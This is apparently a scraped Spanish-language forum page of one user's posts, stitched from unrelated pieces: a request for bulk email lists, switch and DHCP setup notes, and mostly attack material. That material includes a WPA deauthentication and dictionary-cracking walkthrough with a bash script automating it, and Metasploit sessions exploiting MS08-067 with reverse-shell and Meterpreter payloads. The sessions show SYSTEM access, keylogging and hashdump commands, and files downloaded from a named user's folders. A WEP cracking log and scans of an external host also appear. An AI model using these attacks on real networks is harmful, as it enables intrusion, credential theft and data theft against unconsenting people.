Si alguien conoce o tiene listas de correos electronicos o BD o CD's con BD de correos electrónicos por favor que los pase.
Gracias y saludo.
Gracias y saludo.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Mostrar Mensajes MenúC2950 Boot Loader (C2950-HBOOT-M) Version 12.1(11r)EA1, RELEASE SOFTWARE (fc1)
Compiled Mon 22-Jul-02 18:57 by miwang
Cisco WS-C2950-24 (RC32300) processor (revision C0) with 21039K bytes of memory.
2950-24 starting...
Base ethernet MAC Address: 00D0.584E.B340
Xmodem file system is available.
Initializing Flash...
flashfs[0]: 1 files, 0 directories
flashfs[0]: 0 orphaned files, 0 orphaned directories
flashfs[0]: Total bytes: 64016384
flashfs[0]: Bytes used: 3058048
flashfs[0]: Bytes available: 60958336
flashfs[0]: flashfs fsck took 1 seconds.
...done Initializing Flash.
Boot Sector Filesystem (bs:) installed, fsid: 3
Parameter Block Filesystem (pb:) installed, fsid: 4
Loading "flash:/c2950-i6q4l2-mz.121-22.EA4.bin"...
########################################################################## [OK]
Restricted Rights Legend
Use, duplication, or disclosure by the Government is
subject to restrictions as set forth in subparagraph
(c) of the Commercial Computer Software - Restricted
Rights clause at FAR sec. 52.227-19 and subparagraph
(c) (1) (ii) of the Rights in Technical Data and Computer
Software clause at DFARS sec. 252.227-7013.
cisco Systems, Inc.
170 West Tasman Drive
San Jose, California 95134-1706
Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA4, RELEASE SOFTWARE(fc1)
Copyright (c) 1986-2005 by cisco Systems, Inc.
Compiled Wed 18-May-05 22:31 by jharirba
Cisco WS-C2950-24 (RC32300) processor (revision C0) with 21039K bytes of memory.
Processor board ID FHK0610Z0WC
Running Standard Image
24 FastEthernet/IEEE 802.3 interface(s)
63488K bytes of flash-simulated non-volatile configuration memory.
Base ethernet MAC Address: 00D0.584E.B340
Motherboard assembly number: 73-5781-09
Power supply part number: 34-0965-01
Motherboard serial number: FOC061004SZ
Power supply serial number: DAB0609127D
Model revision number: C0
Motherboard revision number: A0
Model number: WS-C2950-24
System serial number: FHK0610Z0WC
Cisco Internetwork Operating System Software
IOS (tm) C2950 Software (C2950-I6Q4L2-M), Version 12.1(22)EA4, RELEASE SOFTWARE(fc1)
Copyright (c) 1986-2005 by cisco Systems, Inc.
Compiled Wed 18-May-05 22:31 by jharirba
Press RETURN to get started!
%LINK-5-CHANGED: Interface FastEthernet0/1, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/1, changed state to up
%LINK-5-CHANGED: Interface FastEthernet0/2, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/2, changed state to up
%LINK-5-CHANGED: Interface FastEthernet0/3, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/3, changed state to up
%LINK-5-CHANGED: Interface FastEthernet0/4, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/4, changed state to up
%LINK-5-CHANGED: Interface FastEthernet0/5, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/5, changed state to up
%LINK-5-CHANGED: Interface FastEthernet0/6, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/6, changed state to up
%LINK-5-CHANGED: Interface FastEthernet0/7, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/7, changed state to up
%LINK-5-CHANGED: Interface FastEthernet0/8, changed state to up
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/8, changed state to up
Switch>enable
Switch#show vlan
vlan database
vlan 2 name Ingenieria
configure terminal
Switch(config)#
Switch(config)#interface fastEthernet 0/1
Switch(config-if)#
Switch(config-if)#switchport mode access
Switch(config-if)#switchport access vlan 2
show vlan
# apt-get install aircrack-ng
# airmon-ng start <iface>
p.e: # airmon-ng start wlan0
# airodump-ng --bssid 00:1B:02:93:AF:9C -c 1 -w redWPA wlan0
--bssid -> MAC del punto de acceso.
-w redWPA -> guardará los datos obtenidos en el archivo "redWPA".
-c -> Canal del punto de acesso
wlan0 -> interfaz adaptador inalambrico.
# aireplay-ng -0 5 -a <MAC_AP> -c <MAC_CLIENTE> <interfaz>
|-> Numero de desautenticaciones que se enviarán.
Si ponemos un 0, enviará desautenticaciones hasta que lo paremos.
# aireplay-ng -0 15 -a 00:1B:02:93:AF:9C -c 01:C2:B3:04:02:05 wlan0
# aircrack-ng redWPA-01.cap
Opening wpa-hand.cap
Read 553 packets.
# BSSID ESSID Encryption
1 00:1B:02:93:AF:9C ap_labs WPA (1 handshake) <------
Choosing first network as target.
Opening wpa-hand.cap
Please specify a dictionary (option -w).
Quitting aircrack-ng...
# aircrack-ng -w <ruta_diccionario> <archivo_de_capturas>
# aircrack-ng -w diccionario.lst redWPA-01.cap
Aircrack-ng 1.0 rc1
[00:00:00] 0 keys tested (0.00 k/s)
KEY FOUND! [ clave__ap ]
Master Key : 18 D4 E8 70 A0 B5 D2 26 4C 61 BA 85 5F 36 8F D9
DA 56 2A D2 51 B6 01 B6 A9 E8 61 B3 CD 92 7D 09
Transcient Key : DA 5E 56 09 35 9E 2D 9F 35 B0 C5 9E A9 41 71 B5
8A 8C B6 1B B5 A0 D2 C0 53 47 C6 05 CC 2C CA C0
C7 41 04 B2 F5 7D 44 DF 71 C5 11 78 5D DE A1 D0
F9 2E BE 54 22 46 82 24 35 91 7E 93 21 9D BF 78
EAPOL HMAC : 6A 31 F7 C0 C8 A7 83 37 50 FD 44 C3 8C 7D 2B 26
#!/bin/bash
# airoWPA-PSK.sh v0.1
# written by ka0x <ka0x01[at]gmail.com>
if [ $UID != 0 ]; then
echo "[!] NECESITAS EJECUTAR EL SCRIPT $0 CON PRIVILEJIOS DE SUPERUSUARIO"
exit
fi
comprueba_mac(){
if [ ! "${#1}" -eq "17" ]; then
echo -e "\033[31mMac Incorrecta\n\033[0m"
exit
fi
}
interfaces() {
echo -e "\n\033[31m[*] Seleccione la interfaz que va a utilizar: \033[0m\n"
INTERFACES=$(iwconfig | grep ESSID | awk '{ print $1 }')
select INTER in $INTERFACES; do
break;
done
clear
}
monitor(){
airmon-ng start $INTER
clear
menu
}
handshake(){
clear
read -p "[-] Introduzca la MAC del AP: " mac_ap
comprueba_mac $mac_ap
read -p "[-] Introduzca la MAC del Cliente: " mac_client
comprueba_mac $mac_client
read -p "[-] Introduzca el canal del AP: " mac_chanel
read -p "[-] Nombre de archivo donde se guardaran los datos capturados: " datas
xterm -hold -title "Obteniendo Handshake en $mac_ap" -geometry 96x60+0+0 -bg "#000000" -fg "#FFFFFF" -e airodump-ng --bssid $mac_ap -c $mac_chanel -w $datas $INTER && clear && menu
}
desautenticacion(){
clear
read -p "[-] Introduzca la MAC del AP: " mac_ap
comprueba_mac $mac_ap
read -p "[-] Introduzca la MAC del cliente asociado: " mac_cliente
comprueba_mac $mac_cliente
read -p "[-] Introduzca el numero de desautenticaciones: " num
xterm -hold -geometry 70x25-0+0 -bg "#000000" -fg "#99CCFF" -title "Desautenticando $mac_cliente del AP $mac_ap $num veces" -e aireplay-ng -0 $num -a $mac_ap -c $mac_cliente $INTER
clear
menu
}
crack_dicc(){
clear
read -p "[-] Introduzca la ruta del diccionario: " diccionario
echo "[-] Seleccione el archivo de datos capturados:"
LS_DIR=$(ls *.cap)
select DATA in $LS_DIR; do
break;
done
xterm -hold -geometry 70x25-0+0 -bg "#000000" -fg "#99CCFF" -title "Obteniendo clave con diccionario: $diccionario" -hold -e aircrack-ng -w $diccionario $DATA
menu
}
menu(){
echo -e "\n[*] Opciones:\n"
echo -e "\033[31m-=-=-=-=-=-=-=-=-=-=-=-=-\033[0m"
echo "1 - Activar Modo Monitor"
echo "2 - Capturar handshake"
echo "3 - Desautenticar cliente"
echo "4 - Obtener clave con diccionario"
echo "5 - Salir"
echo -e "\033[31m-=-=-=-=-=-=-=-=-=-=-=-=-\n\033[0m"
read -p "opcion> " OPCION
case $OPCION in
"1") monitor;;
"2") handshake;;
"3") desautenticacion;;
"4") crack_dicc;;
"5") exit;;
*) echo -e "\033[31m[!] OPCION NO VALIDA\n\033[0m" && menu;;
esac
}
interfaces
menu
# __EOF__
CitarEn informática, un servidor es una computadora que, formando parte de una red, provee servicios a otras computadoras denominadas clientes
CitarUn servidor DHCP (Dynamic Host Configuration Protocol) se utiliza para asignar direcciones IP a las computadoras de los usuarios cuando éstas arrancan.
CitarEl cliente es una aplicación informática que se utiliza para acceder a los servicios que ofrece un servidor, normalmente a través de una red de telecomunicaciones.
Citarsudo apt-get update
Citarsudo gedit /etc/network/interfaces
Citarauto lo
iface lo inet loopback
Citarauto eth0
iface eth0 inet static
adress 192.168.0.10
netmask 255.255.255.0
gateway 192.168.0.1
broadcast 192.128.0.225
Citarsudo /etc/init.d/networking restart
Citarsudo gedit /etc/dhcp3/dhcpd.conf
Citarshared-network miredlocal {
subnet 192.168.0.0 netmask 255.255.255.0 {
options routers 192.168.0.1;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.0.255;
option domain-name "lanlocal.red";
option domain-name-servers 200..21.200.2, 200.21.200.79;
option netbios-name-servers 192.168.0.1;
range 192.168.0.11 192.168.0.199;
default-lease-time 21600;
max-lease-time 43200;
}
Citarhost 253 {
aption host-name "m253.local.red";
hardware athernet XX:XX:XX:XX:XX:XX;
fixed-address 192.168.0.253;
{
Citarsudo /etc/init.d/dhcpd3-server start
Citarsudo arp
sudo apt-get install ruby1.8 libopenssl-ruby1.8 rails
tar -xvvf framework-3.2.tar.gz
cd framework-3.2
./msfconsole
sudo apt-get install nmap
sudo dpkg -i Nessus-4.0.2-ubuntu810_i386.deb
Citarsudo /opt/nessus/sbin/nessus-adduserLuego ingresamos el código de activación:
Login : usuario-para-nessus
Authentication (pass/cert) : [pass] presionas_enter
Login password : escribis-la-pass
Login password (again) : volves-a-escribir-la-pass
Do you want this user to be a Nessus 'admin' user ? (can upload plugins, etc...) (y/n) [n]: y
Enter the rules for this user, and enter a BLANK LINE once you are done :
(the user can have an empty rules set) presionas enter
Login : el-usuario-que-ingresaste
Password : ***********
This user will have 'admin' privileges within the Nessus server
Rules :
Is that ok ? (y/n) [y] y
sudo /opt/nessus/bin/nessus-fetch --register la-clave-que-te-enviaron-a-tu-correo
sudo dpkg -i NessusClient-4.0.2-ubuntu810_i386.deb
sudo /etc/init.d/nessusd restart
nmap -v -sV 10.21.37.179
rcart@rcart:~$ nmap -v -sV 10.21.37.179
Discovered open port 3389/tcp on 10.21.37.179
Discovered open port 139/tcp on 10.21.37.179
Discovered open port 445/tcp on 10.21.37.179
Host 10.21.37.179 appears to be up ... good.
Interesting ports on 10.21.37.179:
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp closed unknown
3389/tcp open microsoft-rdp Microsoft Terminal Service
Service Info: OS: Windows
Host script results:
| Discover OS Version over NetBIOS and SMB: Windows XP
|_ Discover system time over SMB: 2009-10-06 17:06:50 UTC+2
nmap -sP 10.21.37.*
root@rcart:/home/rcart/pentest/scanns# nmap -sP 10.21.37.*
Starting Nmap 4.76 ( http://nmap.org ) at 2009-10-06 20:57 CST
Host 10.21.37.1 appears to be up.
MAC Address: 00:06:5B:DB:8B:8D (Dell Computer)
Host 10.21.37.2 appears to be up.
MAC Address: 00:E0:4D:72:35:73 (Internet Initiative Japan)
Host 10.21.37.3 appears to be up.
MAC Address: 00:0D:87:B2:B4:DD (Elitegroup Computer System Co. (ECS))
Host 10.21.37.72 appears to be up.
MAC Address: 00:E0:4C:A0:0A:F2 (Realtek Semiconductor)
Host 10.21.37.215 appears to be up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.43 seconds
root@rcart:/home/rcart/pentest/scanns#
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 10.21.37.179
RHOST => 10.21.37.179
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.21.37.179 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set LHOST 10.21.17.215
LHOST => 10.21.17.215
msf exploit(ms08_067_netapi) >
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Triggering the vulnerability...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (10.21.17.215:4444 -> 10.21.37.179:1035)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) >
msf auxiliary(ssh_version) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 22 yes The target port
THREADS 1 yes The number of concurrent threads
msf auxiliary(ssh_version) >
msf auxiliary(ssh_version) > set RHOSTS 10.21.0.1
RHOSTS => 10.21.0.1
msf auxiliary(ssh_version) > run
[*] 10.21.0.1:22, SSH server version: SSH-1.5-Cisco-1.25
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_version) >
msf > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads
TIMEOUT 1000 yes The socket connect timeout in milliseconds
msf auxiliary(tcp) >
msf auxiliary(tcp) > set RHOSTS 190.5.x.x
RHOSTS => 190.5.x.x
rmsf auxiliary(tcp) > run
[*] TCP OPEN 190.5.x.x:21
[*] TCP OPEN 190.5.x.x:80
[*] TCP OPEN 190.5.x.x:110
[*] TCP OPEN 190.5.x.x:111
[*] TCP OPEN 190.5.x.x:143
[*] TCP OPEN 190.5.x.x:443
[*] TCP OPEN 190.5.x.x:631
[*] TCP OPEN 190.5.x.x:954
[*] TCP OPEN 190.5.x.x:993
[*] TCP OPEN 190.5.x.x:995
[*] TCP OPEN 190.5.x.x:3128
[*] TCP OPEN 190.5.x.x:3306
[*] TCP OPEN 190.5.x.x:5432
[*] TCP OPEN 190.5.x.x:10000
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >
msf > use auxiliary/scanner/http/writable
msf auxiliary(writable) > set RHOST xxxxx.net
RHOST => xxxxx.net
msf auxiliary(writable) > run
[*] Upload failed on http://190.5.x.x:80 [405 Method Not Allowed]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(writable) >
msf auxiliary(anonymous) > use auxiliary/scanner/http/options
msf auxiliary(options) > set RHOSTS xxxxx.net
RHOSTS => xxxxxx.net
msf auxiliary(options) > run
[*] 190.5.x.x allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(options) >
msf auxiliary(wmap_dir_listing) > use auxiliary/scanner/http/wmap_files_dir
msf auxiliary(wmap_files_dir) > set RHOSTS xxxxx.hn
msf auxiliary(wmap_files_dir) > run
[*] Using code '404' as not found.
[*] Found http://190.5.92.20:80/admin 301
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wmap_files_dir) >
msf auxiliary(writable) > use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(anonymous) > run
[*] 127.0.0.1:21 Anonymous READ (220 (vsFTPd 2.0.7))
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(anonymous) >
msf auxiliary(writable) > use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(anonymous) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(anonymous) >
msf > use auxiliary/scanner/smb/version
msf auxiliary(version) > set RHOSTS 10.21.49.12
msf auxiliary(version) > run
[*] 10.21.49.12 is running Windows XP Service Pack 2 (language: Spanish)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(version) >
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 10.21.49.12
RHOST => 10.21.49.12
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 10.21.17.215
LHOST => 10.21.17.215
msf exploit(ms08_067_netapi) >
Comando background exit help irb migrate quit run use cat cd del download edit getlwd getwd lcd lpwd ls mkdir pwd rm rmdir upload ipconfig clearev execute getpid getuid kill ps reboot reg shell shutdown sysinfo keyscan_dump keyscan_start keyscan_stop hashdump | Descripcion Envia al segundo plano la sesion activa. Termina la sesion abierta de Meterpreter Muestra la ayuda Nos lanza al interprete de Ruby (irb). Migra de un proceso a otro Termina la sesion abierta de Meterpreter Ejecuta un script de Meterpreter. Presionando dos veces TAB veremos los disponibles. Carga una o mas extension de Meterpreter. Presionando dos veces TAB veremos los disponibles. Muestra el contenido de un archivo de texto. Cambia a un directorio Elimina un archivo especifico Descarga un archivo o directorio al equipo local Edita un archivo Muestra el directorio local en el que estamos trabajando Muestra el directorio remoto en el que estamos trabajando Cambia a un directorio local Muestra el directorio local en el que estamos trabajando Muestra los archivos contenidos en un directorio Crea un directorio Muestra el derectorio remoto en el que estamos trabajando Elimina un archivo especifico Elimina un directorio especifico Sube un archivo o directorio al equipo remoto Muestra las interfaces de red Elimina los logs almacenados en la aplicacion "Visor de Sucesos" Ejecuta un comando Muestra la identificacion del proceso en el que estamos Muestra el usuario en el que estamos actualmente Termina un proceso Muestra los procesos en ejecucion Reinicia el equipo remoto Modifica e interactua con el registro remoto Nos lanza a una consola en el equipo remoto Apaga el equipo remoto Nos muestra informacion sobre el equipo remoto Muestra las pulsaciones de teclas grabadas Empieza a capturar pulsaciones de teclas Detiene la captura de pulsaciones de teclas Muestra el contenido de la SAM (Contiene los usuarios y passwords encriptadas) |
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
meterpreter > getpid #Aqui obtenemos el PID en el que estamos
Current pid: 1076 #Despues de la explotacion, Meterpreter se metio en este proceso
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
580 smss.exe \SystemRoot\System32\smss.exe
644 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
676 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
720 services.exe C:\WINDOWS\system32\services.exe
732 lsass.exe C:\WINDOWS\system32\lsass.exe
912 svchost.exe C:\WINDOWS\system32\svchost.exe
980 svchost.exe C:\WINDOWS\system32\svchost.exe
1076 svchost.exe C:\WINDOWS\System32\svchost.exe
1124 svchost.exe C:\WINDOWS\system32\svchost.exe
1232 svchost.exe C:\WINDOWS\system32\svchost.exe
1380 alg.exe C:\WINDOWS\System32\alg.exe
1492 Explorer.EXE C:\WINDOWS\Explorer.EXE
1656 spoolsv.exe C:\WINDOWS\system32\spoolsv.exe
1832 VBoxTray.exe C:\WINDOWS\system32\VBoxTray.exe
1848 ctfmon.exe C:\WINDOWS\system32\ctfmon.exe
2032 WVSScheduler.exe C:\Archivos de programa\Acunetix\Web Vulnerability Scanner 6\WVSScheduler.exe
meterpreter >
meterpreter > migrate 1492
[*] Migrating to 1492...
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 1492
meterpreter >
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd c:\
meterpreter > pwd
c:\
meterpreter > ls
Listing: c:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100555/r-xr-xr-x 115578 fil 2009-09-07 15:08:08 -0600 3c.exe
100777/rwxrwxrwx 0 fil 2009-06-19 14:45:31 -0600 AUTOEXEC.BAT
40777/rwxrwxrwx 0 dir 2009-11-23 14:16:55 -0600 Archivos de programa
100444/r--r--r-- 4952 fil 2001-08-24 09:00:00 -0600 Bootfont.bin
100666/rw-rw-rw- 0 fil 2009-06-19 14:45:31 -0600 CONFIG.SYS
40777/rwxrwxrwx 0 dir 2009-06-19 15:37:30 -0600 Documents and Settings
100444/r--r--r-- 0 fil 2009-06-19 14:45:31 -0600 IO.SYS
40777/rwxrwxrwx 0 dir 2009-09-22 14:41:37 -0600 Inetpub
100444/r--r--r-- 0 fil 2009-06-19 14:45:31 -0600 MSDOS.SYS
40555/r-xr-xr-x 0 dir 2009-06-20 01:22:24 -0600 MSOCache
100555/r-xr-xr-x 47564 fil 2004-08-03 13:38:34 -0600 NTDETECT.COM
40777/rwxrwxrwx 0 dir 2009-06-19 14:59:32 -0600 PFiles
40777/rwxrwxrwx 0 dir 2009-06-19 15:05:15 -0600 System Volume Information
40777/rwxrwxrwx 0 dir 2009-09-22 14:46:04 -0600 WINDOWS
100666/rw-rw-rw- 2565 fil 2009-06-20 01:01:58 -0600 all
100444/r--r--r-- 51 fil 2009-12-13 15:28:09 -0600 autorun.inf
100666/rw-rw-rw- 211 fil 2009-06-19 14:39:45 -0600 boot.ini
100555/r-xr-xr-x 113233 fil 2009-08-26 04:22:00 -0600 hx.exe
100555/r-xr-xr-x 113455 fil 2009-09-01 13:23:59 -0600 i0yva6.exe
100555/r-xr-xr-x 112442 fil 2009-08-31 10:55:28 -0600 mt2.exe
100444/r--r--r-- 250640 fil 2004-08-03 13:59:42 -0600 ntldr
100666/rw-rw-rw- 402653184 fil 2009-12-13 08:17:25 -0600 pagefile.sys
meterpreter >
meterpreter > cd "Documents and Settings"
meterpreter > ls
Listing: c:\Documents and Settings
==================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2009-06-19 15:37:30 -0600 .
40777/rwxrwxrwx 0 dir 1979-12-31 17:00:00 -0600 ..
40777/rwxrwxrwx 0 dir 2009-06-19 14:48:48 -0600 Administrador
40777/rwxrwxrwx 0 dir 2009-06-19 14:43:23 -0600 All Users
40777/rwxrwxrwx 0 dir 2009-06-19 14:45:55 -0600 Default User
40777/rwxrwxrwx 0 dir 2009-06-19 15:05:10 -0600 LocalService
40777/rwxrwxrwx 0 dir 2009-06-19 14:47:12 -0600 NetworkService
40777/rwxrwxrwx 0 dir 2009-07-01 13:11:33 -0600 Ronny Josue
meterpreter >
meterpreter > pwd
C:\Documents and Settings\Ronny Josue\Mis documentos\Mis archivos recibidos\Install\AdobeReader
meterpreter > ls
Listing: C:\Documents and Settings\Ronny Josue\Mis documentos\Mis archivos recibidos\Install\AdobeReader
========================================================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2009-11-23 14:16:00 -0600 .
40777/rwxrwxrwx 0 dir 2009-11-23 14:16:00 -0600 ..
100777/rwxrwxrwx 16661154 fil 2007-06-12 19:04:20 -0600 AR81Lite_ES.exe
meterpreter > lpwd
/root
meterpreter > download AR81Lite_ES.exe
[*] downloading: AR81Lite_ES.exe -> AR81Lite_ES.exe
[*] downloaded : AR81Lite_ES.exe -> AR81Lite_ES.exe
meterpreter >
meterpreter > cd \
meterpreter > shell
Process 1104 created.
Channel 4 created.
Microsoft Windows XP [Versi�n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>
meterpreter > execute -i -H -f cmd.exe
Process 1396 created.
Channel 5 created.
Microsoft Windows XP [Versi�n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>
wesside-ng-i wlan0
[13:51:32] Uso de mac 00: C0: CA: 17: DB: 6A
[13:51:32] Looking for a una víctima ...
[13:51:32] Encontrados SSID (de peluche) BSS = (00:14:6 C: 7E: 40:80) chan = 9
[13:51:32] Jurada
[13:51:32] Associated (ID = 5)
[13:51:37] Got petición ARP de (00: D0: CF: 03:34:8 C)
[13:51:37] datalen 54 conocidos abierto 22
[13:51:37] Got 22 bytes de PRGA IV = (0e: 4e: 02) PRGA = A5 DC C3 AF 43 34 17 0D 0D 7E 2A C1 44 8A DA 51 A4 DF BB C6 4F 3C
[13:51:37] Got 102 bytes de PRGA IV = (0f: 4e: 02) PRGA = 17 03 74 98 9F CC FB AA A1 B3 5B 00 53 EC 8F C3 BB F7 56 21 09 95 12 70 24 8C C0 16 40 9F A8 BD BA C4 CC 18 04 A1 41 47 B3 22 8B D2 42 DC 71 54 CE AD FE D0 C3 15 7E EB D1 E2 BB 69 7F 11 8A 99 40 FC 75 CE 12 BF 3B C8 2A 32 88 8A DC E8 35 7C EE DA A3 E3 6B 0C 45 21 DC BD 23 59 28 85 24 49 18 49 1C 24 6D E2
[13:51:37] Got 342 bytes de PRGA IV = (10:4 e: 02) PRGA = 5C EC 18 24 F3 21 B2 74 2A 86 97 C7 4C 22 EC 42 00 3A C6 07 0C 02 AA D6 B6 D8 FF B1 16 F8 40 31 B7 95 3B F8 1B BD 94 8B 3B 7A 98 DE C6 72 FD F8 A5 FC E7 81 A0 9E 01 76 44 57 C4 EB AE D7 AB EB 2F 40 C8 E5 5F EF 13 DB F4 F7 F2 91 D9 36 77 C1 F0 9C E4 8C BA F9 50 C0 B0 E7 23 75 85 41 82 54 F5 22 3C A9 45 0C 1F AE DA 3B F7 AA 41 30 23 63 97 B1 42 4C A8 0E C0 5A 7E A2 58 C2 02 B8 7F DB C7 CC 66 4D 86 53 30 E0 A0 81 52 13 14 08 5F 45 C5 AC 21 C3 90 86 A1 8D 45 CC 7C F2 A2 95 34 EF 38 59 FA 21 0F CC 63 81 05 26 8D B8 84 A1 D3 DF 5D E0 CA 23 52 85 4F 61 5B E3 83 4B 2A 10 0A 14 94 FA 90 D4 FC 3F 7B CD A9 C3 E3 4D B7 99 BD 21 D4 FC DB 60 0C 92 8D 76 87 EF F7 45 C6 D7 0B 96 A4 18 41 63 48 79 E0 4E 3A 9F 1B 8D 17 F5 B0 FE 30 F3 27 55 EA E1 8A 60 FA 9E CB CE D9 1D EE 94 20 20 EB 58 F8 55 38 4F C9 E7 53 55 94 6C 6A 6D F0 D5 4E DB 78 D6 52 A3 34 68 2C 8B 7A EA C8 DA 3B D9 CB 4C 65 E6 CE B8 EE CD 58 DD C1 C8 F8 08 1B 27 EC 74 7E AD A0 0E 1E 85 79 F4 C0 54 D9 99 51 CA 96 02 73 93 33 6F E6 D5 F1 55 81 2B C4 AA 3A B2 0A C6 04 FE
[13:51:39] Guessing PRGA 8e (IP byte = 230)
[13:51:39] Got claro byte de texto: 192
[13:51:40] Guessing PRGA be (IP byte = 198)
[13:51:40] Got claro byte de texto: 168
[13:51:40] Guessing PRGA 8d (IP byte = 47)
[13:51:40] Got claro byte de texto: 1
[13:51:40] Guessing PRGA 12 (IP byte = 240)
[13:51:40] Got claro byte de texto: 200
[13:51:40] Got IP = (192.168.1.200)
[13:51:40] Mi IP = (192.168.1.123)
[13:51:40] Envío de solicitud ARP para: 192.168.1.200
[13:51:40] Got ARP de respuesta (00: D0: CF: 03:34:8 C)
[13:52:25] WEP = 000009991 (crack siguiente en 10000) IV = 60:62:02 (rate = 115)
[13:52:36] WEP = 000012839 (crack siguiente en 20000) IV = 21:68:02 (rate = 204)
[13:52:25] A partir crack PID = 2413
[13:52:27] WEP = 000010324 (crack siguiente en 20000) IV = 0d: 63:02 (tasa = 183)
[13:54:03] A partir crack PID = 2415
[13:53:28] WEP = 000023769 (crack siguiente en 30000) IV = 79:32:00 (rate = 252)
[13:53:11] A partir crack PID = 2414
[13:53:13] WEP = 000020320 (crack siguiente en 30000) IV = 7d: 2b: 00 (tasa = 158)
[13:54:21] WEP = 000034005 (crack siguiente en 40000) IV = 53:47:00 (rate = 244)
Las teclas [328385:55:08] Probado 5 / 70000
Byte profundidad KB (votación)
0 0 / 1 01 (206) 3B (198) 5F (190) 77 (188) 3D (187) D2 (187) 60 (186) 6F (186) A1 (185) 48 (184)
1 0 / 1 23 (232) 82 (190) BF (187) 4E (184) 0D (183) 90 (181) B9 (181) 08 (180) 1A (180) 8A (180)
2 0 / 1 45 (200) F0 (186) 52 (184) AE (184) 75 (183) 48 (181) A1 (180) 71 (179) DE (179) 21 (178)
3 0 / 1 67 (221) AE (202) B2 (193) 14 (191) 51 (184) 6D (184) 64 (183) 65 (183) 5B (182) 17 (181)
1A 4 0 / 5 89 (182) PP (182) 74 (181) C2 (181) CC (181) 64 (180) CD (180) 5F (179) A6 (179) (178)
Clave: 01:23:45:67:89
[13:54:51] WEP = 000040387 (crack siguiente en 50000) IV = 0d: a0: 02 (tasa = 180)
